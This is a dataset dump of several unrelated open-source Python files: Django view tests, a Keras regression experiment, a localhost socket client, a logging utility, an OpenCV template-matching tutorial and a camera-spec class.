\"\"\"","repo_name":"genropy/genropy_saved","sub_path":"projects/gnrcore/packages/sys/webpages/dbstruct.py","file_name":"dbstruct.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"23212866536","text":"from django.conf import settings\nfrom django.test import TestCase, override_settings\nfrom django.urls import reverse\n\n\n@override_settings(DEBUG=False)\nclass TestHeartbeats(TestCase):\n def test_heartbeat(self):\n response = self.client.get(\"/__heartbeat__\")\n self.assertEqual(response.status_code, 200)\n\n def test_lbheartbeat(self):\n response = self.client.get(\"/__lbheartbeat__\")\n self.assertEqual(response.status_code, 200)\n\n\nclass TestContextProcessors(TestCase):\n def test_google_analytics_omitted_if_setting_false(self):\n with self.settings(USE_GOOGLE_ANALYTICS=False):\n headers = {settings.OPENIDC_EMAIL_HEADER: \"user@example.com\"}\n response = self.client.get(reverse(\"home\"), **headers)\n self.assertEqual(response.status_code, 200)\n html = response.content.decode(\"utf-8\")\n # Note the 'not'!\n self.assertNotIn(\"www.googletagmanager.com\", html)\n\n def test_google_analytics_included_if_setting_true(self):\n with self.settings(USE_GOOGLE_ANALYTICS=True):\n headers = {settings.OPENIDC_EMAIL_HEADER: \"user@example.com\"}\n response = self.client.get(reverse(\"home\"), **headers)\n self.assertEqual(response.status_code, 200)\n html = response.content.decode(\"utf-8\")\n self.assertIn(\"www.googletagmanager.com\", html)\n","repo_name":"mozilla/experimenter","sub_path":"experimenter/experimenter/base/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"5"} +{"seq_id":"22390108702","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 22 10:14:48 2020\n\n@author: 10094\n\"\"\"\nimport numpy as np\nimport keras\nimport math\nimport matplotlib.pyplot as plt\nimport sklearn.preprocessing as pre\nfrom keras.models import *\nfrom keras.layers import *\nfrom sklearn.metrics import mean_squared_error\nfrom keras.optimizers import SGD ,RMSprop, Adam\nfrom sklearn.cluster import KMeans\nnp.random.seed(0)\n# In[] load data and 
data process\ndata = np.load('array_sum.npy')\ntrain_num = 50\nerror_ave = []\n# 1. shuffle the data; mean prediction error: 0.032979106556479884\n# permutation = np.random.permutation(data.shape[1])\n# data = data[:,permutation]\n\n# 2. take the points with the largest z values; mean prediction error: 3830339094997.4424\ndata = np.sort(data)\ndata = data[:,::-1]\n\n# 3. cluster and take data from each part; mean prediction error: 83369014864212.34\n# kmeans = KMeans(n_clusters = 5,verbose= 0)\n# data_all = np.zeros(30897).reshape(-1,1)\n\n# for i in range(4):\n#     datai=data[i,].reshape(-1,1)\n#     # data0 = np.zeros(1).reshape=(1,1)\n\n#     kmeans.fit(datai)\n#     label_pred = kmeans.labels_\n#     x0 = datai[label_pred == 0]\n#     x1 = datai[label_pred == 1]\n#     x2 = datai[label_pred == 2]\n#     x3 = datai[label_pred == 3]\n#     x4 = datai[label_pred == 4]\n#     data_x = np.vstack((x0[0:10],x1[0:10],x2[0:10],x3[0:10],x4[0:10]))\n#     data_y = np.vstack((x0[10:,],x1[10:,],x2[10:,],x3[10:,],x4[10:,]))\n#     data_single = np.vstack((data_x,data_y))\n#     data_all = np.hstack((data_all,data_single))\n# data = data_all.T\n# data = data[1:5,]\n\n# scaler = pre.StandardScaler().fit(data.reshape(-1,1))\n# scaler_data = scaler.transform(data)\n# data = scaler_data\n# x = data[:,0:train_num]\n# y = data[:,train_num:]\n\nscaler = pre.StandardScaler()\nx = scaler.fit_transform(data[:,0:train_num])\ny = scaler.fit_transform(data[:,train_num:])\n\n# leave-one-out over the four rows: train on three, test on the held-out row\nfor i in range(4):\n    x_train = np.delete(x,i,axis=0)\n    x_test = x[i,].reshape(1,-1)\n    y_train = np.delete(y,i,axis=0)\n    y_test = y[i,].reshape(1,-1)\n\n# x_train = x[0:3,]\n# x_test = x[3,].reshape(1,-1)\n# y_train = y[0:3,]\n# y_test = y[3,].reshape(1,-1)\n\n    # In[] set value\n    out_num = y_test.shape[1]\n    hidden_layers = 15\n    Epoch = 1000\n    Batch_size = 1\n    Validation_data = (x_test,y_test)\n\n    # In[] build model\n    model = Sequential()\n    model.add(Dense(hidden_layers, input_shape=(train_num,)))\n    model.add(Activation(\"relu\"))\n    # model.add(Dense(256,activation='sigmoid'))\n    model.add(Dense(out_num))\n    model.summary()\n    # model.compile(loss=\"mape\",optimizer=OPTIMIZER)\n\n    model.compile(loss='mse',optimizer=Adam(lr=0.001,decay=1e-5))\n\n    # model.compile(loss='mape', optimizer='SGD')\n    # Callbacks = [keras.callbacks.ReduceLROnPlateau(monitor='val_loss',\n    #                                         factor=0.1,patience=5,mode='auto',)]\n\n    history = model.fit(x_train, y_train, epochs=Epoch, batch_size=Batch_size,\n                        # callbacks=Callbacks,\n                        validation_data=Validation_data)\n    loss = history.history['loss']\n    mas = history.history['val_loss']\n\n    plt.figure(figsize=(12,8))\n    plt.plot(loss,linewidth=3)\n    plt.plot(mas,linewidth=3)\n    plt.legend(('loss','val_loss'))\n    plt.show()\n    print('loss:',loss[-1])\n\n    # predict on the held-out sample\n    pre = model.predict(x_test)\n    pre = scaler.inverse_transform(pre)\n    y_test = scaler.inverse_transform(y_test)\n    rmse = math.sqrt(mean_squared_error(pre, y_test))\n    print('Test RMSE: %.3f' % rmse)\n\n    index = []\n    a = abs((y_test-pre)/y_test)\n    b = np.isinf(a)\n    for i in range(b[0].shape[0]):\n        if b[0][i] == True:\n            index.append(i)\n\n    new_array = np.delete(a[0],index)\n    jj=0\n    for i in new_array:\n        if i>=0.2:\n            # print(i)\n            jj+=1\n    pj = new_array.sum()/new_array.shape[0]\n    print(\"points with absolute percentage error over 20 percent: %s\" % jj)\n    print(\"mean prediction error: %s\" % pj)\n    error_ave.append(pj)","repo_name":"sssssshf/machine-learning","sub_path":"predict_daner/pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70877716633","text":"\"\"\"\nClient\nGabriel da Silva Carvalho - 0050013382\n\"\"\"\n\nfrom socket import *\ns = socket()\n\n
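# one-shot exchange: send the amount, read a single reply, then close the socket\n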
valor = input(\"Enter a dollar amount for your search (e.g. '100.00'): \")\nmeusbytes = str.encode(str(valor), \"UTF-8\")\n\ns.connect((\"127.0.0.1\", 8752))\ns.send(meusbytes)\n\ndata = s.recv(1024)\nprint(data.decode(\"utf-8\"))\n\ns.close()","repo_name":"GabrielCarvalho06/Projeto_Thread_API_Servidor_Cliente","sub_path":"av3_cliente.py","file_name":"av3_cliente.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21083067103","text":"# coding=utf-8\nfrom __future__ import unicode_literals\nimport logging\nimport json\nimport os\n\n\nLOG_LEVEL = \"debug\"\nLOG_OUTPUT = 0\n'''log configuration'''\nlevels = {'debug': logging.DEBUG,\n          'info': logging.INFO,\n          'warning': logging.WARNING,\n          'error': logging.ERROR,\n          'critical': logging.CRITICAL}\n\nform = '[%(asctime)s | %(filename)s, %(funcName)s, '\nform += 'line %(lineno)d | %(levelname)s] %(message)s'\nformatter = logging.Formatter(form)\nlogging.getLogger('hens').setLevel(levels[\"debug\"])\n\nif LOG_OUTPUT == 0:\n    ch = logging.StreamHandler()\n    ch.setLevel(levels[LOG_LEVEL])\n    ch.setFormatter(formatter)\n    logging.getLogger('hens').addHandler(ch)\n\nif LOG_OUTPUT == 1:\n    path = os.getcwd()\n    fh = logging.FileHandler(os.path.join(path, \"log\", \"logfile.log\"))\n    fh.setLevel(levels[LOG_LEVEL])\n    fh.setFormatter(formatter)\n    logging.getLogger('hens').addHandler(fh)\n\n\nclass Util(object):\n\n    logger = logging.getLogger(\"hens\")\n\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def read_json(filename):\n        with open(filename, \"rb\") as r:\n            return json.load(r)\n\n    @staticmethod\n    def write_json(filename, data):\n        with open(filename, \"wb\") as w:\n            json.dump(data, w)\n","repo_name":"PengRich/hens_old","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5552430115","text":"import cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# Template Matching is a method for searching and finding the location of a template image in a larger image. OpenCV comes with a function cv.matchTemplate() for this purpose. It simply slides the template image over the input image (as in 2D convolution) and compares the template and the patch of the input image under the template image.\n# It returns a grayscale image, where each pixel denotes how well the neighbourhood of that pixel matches the template.\n# The function slides through image, compares the overlapped patches of size w×h against templ using the specified method and stores the comparison results in result. Here are the formulae for the available comparison methods ( I denotes image, T template, R result ). The summation is done over the template and/or the image patch: x′=0...w−1,y′=0...h−1\n# After the function finishes the comparison, the best matches can be found as global minimums (when TM_SQDIFF was used) or maximums (when TM_CCORR or TM_CCOEFF was used) using the minMaxLoc function. In case of a color image, template summation in the numerator and each sum in the denominator is done over all of the channels and separate mean values are used for each channel. That is, the function can take a color template and a color image. The result will still be a single-channel image, which is easier to analyze.\n\n# result = cv.matchTemplate( image, templ, method[, result[, mask]] )\n
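# NOTE: plain template matching is not scale- or rotation-invariant; the\n# template must appear in the image at roughly its original size and angle.\n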
# result - Map of comparison results. It must be single-channel 32-bit floating-point. If image is W×H and templ is w×h , then result is (W−w+1)×(H−h+1) .\n# method - Parameter specifying the comparison method, see cv::TemplateMatchModes\n# mask - Mask of the searched template. It must have the same datatype and size as templ. It is not set by default. Currently, only the TM_SQDIFF and TM_CCORR_NORMED methods are supported. \n\ndef MatchingTemplate(method):\n\n\timg2 = img.copy()\n\tprint(\"This result is using method\", methods[method])\n\tres = cv.matchTemplate(img2, template, method)\n\tprint(res)\n\n\tmin_val, max_val, min_loc, max_loc = cv.minMaxLoc(res)\n\tcv.normalize(res, res, 0, 1, cv.NORM_MINMAX, -1)\n\t# if the method is SQDIFF the best match is the global minimum, else it is the global maximum\n\tif method in [cv.TM_SQDIFF, cv.TM_SQDIFF_NORMED]:\n\t\ttop_left = min_loc\n\telse:\n\t\ttop_left = max_loc\n\n\tbottom_right = (top_left[0] + w, top_left[1] + h)\n\tcv.rectangle(img2, top_left, bottom_right, 0, 2)\n\tmatch = \"match_using \" + methods[method]\n\tcv.imshow(match, img2)\n\tcv.imshow('result', res)\n\nif __name__ == '__main__':\n\n\tglobal img\n\timg = cv.imread('messi.jpg', 0)\n\tglobal template\n\ttemplate = cv.imread('template1.jpg', 0)\n\tw, h = template.shape[::-1]\n\tcv.namedWindow('image', cv.WINDOW_AUTOSIZE)\n\tcv.namedWindow('result', cv.WINDOW_AUTOSIZE)\n\n\tglobal methods\n\tmethods = ['cv.TM_SQDIFF', 'cv.TM_SQDIFF_NORMED', 'cv.TM_CCORR', 'cv.TM_CCORR_NORMED', 'cv.TM_CCOEFF', 'cv.TM_CCOEFF_NORMED']\n\n\ttrackbar_label = 'Method: \\n 0: SQDIFF \\n 1: SQDIFF NORMED \\n 2: TM CCORR \\n 3: TM CCORR NORMED \\n 4: TM COEFF \\n 5: TM COEFF NORMED'\n\tcv.createTrackbar(trackbar_label, 'image', 0, 5, MatchingTemplate)\n\tcv.imshow('image', img)\n\tif cv.waitKey(0) == ord('c'): cv.destroyAllWindows()\n","repo_name":"AvnishGupta143/opencv_basic","sub_path":"Image_processing_py_codes/12.Template_Matching.py","file_name":"12.Template_Matching.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23470660182","text":"class SDVVF:\n    def __init__(self):\n\n        self.Sensitivity = {\n            'Value': 0.05,\n            'Unit': 'lux',\n            'Type': 'float'\n        }\n\n        self.DynamicRange = {\n            'Value': 8,\n            'Unit': 'bit',\n            'Type': 'int'\n        }\n\n        self.VideoFormats = {\n            'Length': 1280,\n            'Width': 960,\n            'Unit': 'pixel',\n            'Type': 'int'\n        }\n\n        self.VideoFormatsPixel = {\n            'Total': 1.2*10**6,\n            'Unit': 'pixel',\n            'Type': 'int'\n        }\n\n        self.FrameRateMaximum = {\n            'Value': 15,\n            'Unit': 'fps', # frames per second\n            'Type': 'int'\n        }\n","repo_name":"juanen1602/API_Camera_DMK","sub_path":"JsonFile/Specifications/GeneralBehavior/SDVVF/sdvvf.py","file_name":"sdvvf.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"hi","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}